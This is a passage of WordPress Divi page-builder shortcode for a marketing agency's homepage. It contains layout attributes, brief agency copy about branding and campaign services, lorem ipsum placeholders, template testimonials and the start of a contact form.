custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" 